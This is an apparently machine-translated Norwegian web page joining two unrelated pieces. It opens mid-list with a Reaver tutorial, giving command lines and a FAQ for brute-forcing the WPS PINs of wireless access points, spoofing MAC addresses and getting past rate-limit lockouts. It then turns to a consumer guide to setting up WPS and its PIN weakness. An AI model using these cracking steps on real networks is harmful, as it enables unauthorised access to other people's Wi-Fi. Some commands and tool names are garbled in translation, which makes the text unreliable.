  6. Noen implementeringer av WPS-protokollen vil avslutte forbindelsen hvis PIN-koden er feil, selv om de ifølge spesifikasjonen skal returnere en spesiell melding. Reaver gjenkjenner denne situasjonen automatisk, for dette er det et «—nack»-alternativ: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Alternativet '--eap-terminate' er ment å fungere med de tilgangspunktene som krever avslutning av WPS-økten ved å bruke EAP FAIL-meldingen: # reaver -i mon0 -b 00:01:02:03:04:05 --eap -terminere
  8. Forekomsten av feil i WPS-økten kan bety at AP begrenser antall forsøk på å taste inn en PIN-kode, eller ganske enkelt er overbelastet med forespørsler. Informasjon om dette vil vises på skjermen. I dette tilfellet setter Reaver aktiviteten på pause, og pausetiden kan stilles inn ved å bruke '--fail-wait'-alternativet: # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

FAQ

Spørsmål: Hvilken trådløs adapter trengs for hacking?

Svar: Før du eksperimenterer, må du sørge for at den trådløse adapteren kan fungere i overvåkingsmodus. Den beste måten er å sjekke listen over støttet maskinvare på nettstedet til Aircrack-ng-prosjektet. Hvis spørsmålet oppstår om hvilken trådløs modul du skal kjøpe, kan du starte med hvilken som helst adapter basert på RTL8187L-brikkesettet. USB-dongler kan enkelt bli funnet på Internett for $20.

Spørsmål: Hvorfor får jeg "timeout" og "out of order" feil?

Svar: Dette skjer vanligvis på grunn av lav signalstyrke og dårlig kommunikasjon med tilgangspunktet. I tillegg kan tilgangspunktet midlertidig blokkere bruken av WPS.

Spørsmål: Hvorfor fungerer ikke MAC-adresseforfalskning for meg?

Svar: Det er mulig du vil forfalske MAC-en til det virtuelle grensesnittet mon0, og dette vil ikke fungere. Du må spesifisere navnet på det virkelige grensesnittet, for eksempel wlan0.

Spørsmål: Hvorfor fungerer Reaver dårlig når signalet er dårlig, selv om den samme WEP-hackingen fungerer bra?

Svar: WEP-cracking skjer vanligvis ved å retransmittere fangede pakker for å oppnå flere initialiseringsvektorer (IVer) som trengs for en vellykket crack. I dette tilfellet spiller det ingen rolle om en pakke ble tapt eller på en eller annen måte skadet underveis. Men for å angripe WPS, må du strengt følge pakkeoverføringsprotokollen mellom tilgangspunktet og Reaver for å sjekke hver PIN-kode. Og hvis en pakke samtidig går tapt eller kommer i en usømmelig form, må du reetablere WPS-økten. Dette gjør angrep på WPS mye mer avhengig av signalstyrke. Det er også viktig å huske at bare fordi den trådløse adapteren ser et tilgangspunkt, betyr ikke dette at tilgangspunktet ser deg. Så hvis du er den lykkelige eieren av en høyeffektsadapter fra ALFA Network og en antenne på et par titalls dBi, så ikke forvent å kunne bryte alle de fangede tilgangspunktene.

Spørsmål: Reaver sender alltid den samme PIN-koden til tilgangspunktet, hva er i veien?

Svar: Sjekk om WPS er aktivert på ruteren. Dette kan gjøres ved å bruke vaskeverktøyet: kjør det og sjekk at målet ditt er på listen.

Spørsmål: Hvorfor kan jeg ikke knytte til et tilgangspunkt?

Svar: Dette kan skyldes dårlig signalstyrke eller fordi adapteren din er uegnet for slik forskning.

Spørsmål: Hvorfor får jeg stadig "rate limiting oppdaget"-feil? Svar: Dette er fordi tilgangspunktet har blokkert WPS. Vanligvis er dette en midlertidig blokkering (omtrent fem minutter), men i noen tilfeller kan de innføre et permanent forbud (oppheve blokkering kun gjennom det administrative panelet). Det er en ubehagelig feil i Reaver versjon 1.3, på grunn av hvilken fjerning av slike låser ikke oppdages. Som en løsning foreslår de å bruke "—ignore-locks"-alternativet eller å laste ned den nyeste versjonen fra SVN.

Spørsmål: Kan jeg kjøre to eller flere forekomster av Reaver samtidig for å få fart på angrepet mitt?

Svar: Teoretisk sett er det mulig, men hvis de angriper det samme tilgangspunktet, vil søkehastigheten neppe øke, siden den i dette tilfellet er begrenset av den svake maskinvaren til tilgangspunktet, som allerede er fullt lastet selv med en angriper .

I disse dager vinner trådløse Internett-tilkoblinger som bruker Wi-Fi-teknologi enorm popularitet. Dette forklares med det faktum at brukeren blir helt uavhengig av nettet av kabler og ledninger nå er det ikke nødvendig å være bundet til arbeidsplassen. Hvis du ønsker det, kan du flytte den bærbare datamaskinen til et hvilket som helst sted i leiligheten din eller ta den med ut på gårdsplassen til huset ditt uten å bryte forbindelsen til Internett. Utviklingen av disse teknologiene har imidlertid reist spørsmålet om beskyttelse og fordi de fleste brukere ikke har den nødvendige kunnskapen. Derfor har produsenter av trådløst utstyr utviklet en spesiell WPS-protokoll. Den lar deg automatisere prosessen, noe som sparer uerfarne brukere fra unødvendig problemer.

WPS - hva er det og hva er det for?

Denne forkortelsen står for Wi-Fi ProtectedSetup. Denne standarden ble utviklet av en allianse av produsenter av trådløse Wi-Fi-enheter, hvis hovedmål var å forenkle oppsettprosessen, og denne teknologien lar selv en uerfaren bruker enkelt og raskt etablere en trådløs tilkobling til Internett, uten å fordype seg. inn i alle forviklingene ved Wi-Fi-krypteringsprotokoller. Takket være WPS kan enheten automatisk sette nettverksnavnet, samt krypteringen som skal brukes for å beskytte mot forsøk. Tidligere måtte alle disse prosedyrene gjøres manuelt.

Sette opp trådløse nettverk ved hjelp av WPS

Vi fant ut hva Wi-Fi ProtectedSetup er og hvorfor det er nødvendig. La oss nå finne ut hvordan du setter opp et trådløst nettverk. Hva trengs for dette? Vi trenger en personlig datamaskin (helst med Windows 7-operativsystemet) og et tilgangspunkt som støtter WPS-modus. Oppsettprosessen for dette systemet er lik for alle enheter som støtter denne teknologien, uavhengig av modell og produsent. Så la oss begynne å beskrive prosedyren. Det første trinnet er å slå på ruteren. På datamaskinen oppdaterer vi listen over tilgjengelige trådløse nettverk. Rutermodellen vår vises på skjermen. Klikk på "Koble til"-knappen. Siden det aktuelle trådløse nettverket for øyeblikket ikke har angitt sikkerhetsparametere, vil datamaskinens operativsystem be deg om å konfigurere tilgangspunktet. Klikk "OK" og fortsett å jobbe. På neste trinn vil WPS-wifi-systemet be om en PIN-kode. Du finner denne informasjonen på et spesielt klistremerke på ruteren. Vanligvis består fabrikkkoden av åtte sifre. Om ønskelig kan du endre det i enhetsinnstillingene. Koden skal skrives inn i popup-vinduet og klikk "Neste". Et vindu med konfigurasjonene til ruteren vår vises på skjermen. Operativsystemet vil be deg om å tilordne de grunnleggende parametrene til det opprettede trådløse nettverket, nemlig: navn, krypteringstype, sikkerhetsnøkkel. Det er alt, WPS-oppsettet er fullført, tilgangspunktet er klart til bruk.

Funksjoner for tilkoblingsoppsett

1. I dag er støtte for denne teknologien fullt implementert i Windows VistaSP2 og Windows 7. Men hvis en tidligere versjon av operativsystemet er installert på datamaskinen, så fortvil ikke du kan bruke et spesielt verktøy for å konfigurere dette systemet. Den finner du på disken som fulgte med det trådløse tilgangspunktet.

2. Systemutviklere anbefaler at når du kobler til et trådløst nettverk som ennå ikke har satt sikkerhetsinnstillinger, utføres konfigurering. Du kan imidlertid nekte denne prosedyren og koble til nettverket uten foreløpig oppsett. For å gjøre dette må du klikke på "Avbryt", og dermed omgå prosedyren for å velge parametere.

3. Når du setter opp et nettverk, kan systemsikkerhet stå som standard. Det er bedre å erstatte PIN-koden, og jo mer kompleks den er, jo bedre. Spesiell oppmerksomhet bør rettes mot nettverksnavnet. Det er veldig viktig at det ikke inneholder mellomrom og er skrevet med latinske bokstaver.

Koble nye enheter til Wi-Fi

Hvis du har en bærbar PC, smarttelefon, nettbrett, kan de også konfigureres til å fungere med det opprettede trådløse nettverket. For å gjøre dette søker vi etter tilgjengelige forbindelser. Velg navnet på nettverket vårt fra listen og koble til det. Systemet vil be deg om å angi en sikkerhetskode eller trykke på WPS-tilkoblingsknappen på ruteren. Skriv inn passordet, og enheten er klar til bruk. Som du kan se, var vi i stand til å konfigurere tilgangspunktet uten å gå inn i enhetens nettgrensesnitt. Så praktisk er det - WPS-teknologi. Hva er en knapp på en ruter og hva er den til, skal vi se nærmere på.

Hvordan implementeres WPS ved tilgangspunktet?

Denne funksjonen finnes i de fleste moderne rutere. WPS-teknologi lar deg sette et navn på hjemmenettverket ditt, samt sette opp krypteringsbeskyttelse mot hacking og uautorisert tilgang helt automatisk. Denne prosessen utføres ved hjelp av en spesiell forespørsel, der de nødvendige parametrene overføres fra ruteren til enhetskontrolleren. Deretter utfører WPS-systemet også alle påfølgende tilkoblinger av nye enheter til det nyopprettede Wi-Fi-nettverket. En slik forespørsel gjøres ved å bruke en spesiell WPS-knapp. Nesten alle brukere av trådløse nettverk vet, men bare noen få vil svare på hva denne knappen er for. Så la oss se på dette spørsmålet.

WPS-knapp på ruteren

Denne funksjonaliteten er oftest plassert på frontpanelet til enheten, sjeldnere på baksiden eller siden. Plasseringen avhenger av ruterprodusenten og enhetsmodellen. Noen ganger kan produsenten kombinere knappen for trådløse innstillinger med en tilbakestillingsknapp. Derfor bør du være ekstremt forsiktig når du bruker denne funksjonen. I dette tilfellet bestemmes valg av knapp av varigheten av dens holding. For å aktivere oppsettmodus for trådløst nettverk er trykktiden 1-2 sekunder, og for å tilbakestille alle innstillinger - 5-7 sekunder. Som du kan se, er det viktigste å ikke overdrive det. Hvis det aktuelle elementet mangler på ruterkroppen, betyr det at parameteroverføringsforespørselsmodusen startes i enhetens nettgrensesnitt, som kan åpnes i nettleseren via

Tilordne WPS-knappen på nytt

Fastvaren til noen rutere lar deg endre handlingen til det nevnte elementet. For eksempel lar ASUSWRT deg tilordne WPS på nytt og bruke en mekanisme for å slå Wi-Fi på eller av. Svært ofte brukes denne knappen ganske enkelt ikke av brukeren. Derfor kan modusen for å slå av radiomodulen uten å måtte endre innstillingene til webgrensesnittet være enda mer nyttig. For å omdefinere formålet med knappen, må du gå til administrasjonsdelen og åpne fanen "System". Deretter bør du overstyre WP Sbutton-elementet og velge Toggle Radio.

Ulemper med WPS-teknologi

Wi-Fi-rutere som støtter dette systemet har et sikkerhetssårbarhet for trådløst nettverk, som gjør det mulig å velge nøkler for krypteringsprotokoller. For å gjøre dette er det mange programmer på Internett som kan utføre lignende prosedyrer. I tillegg har de en database med ferdige, ofte brukte nøkler. Selve PIN-koden består av åtte sifre, så i teorien er det 10 8 mulige kombinasjoner. Imidlertid er det i realiteten betydelig færre slike alternativer. Dette forklares med at det siste sifferet i koden inneholder en kontrollsum beregnet fra de første syv sifrene. I tillegg inneholder WPS-teknologiens autentiseringsprotokoll også sårbarheter. Som et resultat har vi følgende bilde: for å velge en nøkkel, må du søke gjennom bare 11 000 alternativer (omtrent). Og dette er relativt lite. Ulempen med teknologien vi vurderer er at de fleste rutere har en streng PIN-kode. Som et resultat, hvis nøkkelen er kompromittert, vil endring av passordet ikke beskytte nettverket ditt.

Konklusjon

Fordelen med denne teknologien er dens brukervennlighet. Brukeren trenger ikke å forstå alle innstillingene selv. I tillegg lar systemet deg raskt og enkelt koble ekstra enheter til et eksisterende nettverk. Denne modusen lanseres i rutere på forskjellige måter:

1. Push ButtonConnect - automatiske innstillinger startes ved å trykke på WPS-knappen, som er plassert på ruterhuset.

2. Skriv inn PIN-koden gjennom ruterens webgrensesnittvindu. Brukeren som bruker denne metoden må først starte nettleseren, deretter åpne tilgangspunktgrensesnittet og angi nøkkelen. Deretter starter oppsettsprosessen.

3. Tast inn en PIN-kode på en personlig datamaskin. Nøkkelen legges inn først etter at ruteren er koblet til PC-en og startet en spesiell WPS-økt.

Generelt er denne teknologien veldig nyttig og praktisk for uerfarne brukere, til tross for at avanserte brukere liker å bebreide den for sin svake beskyttelse mot uautorisert tilgang.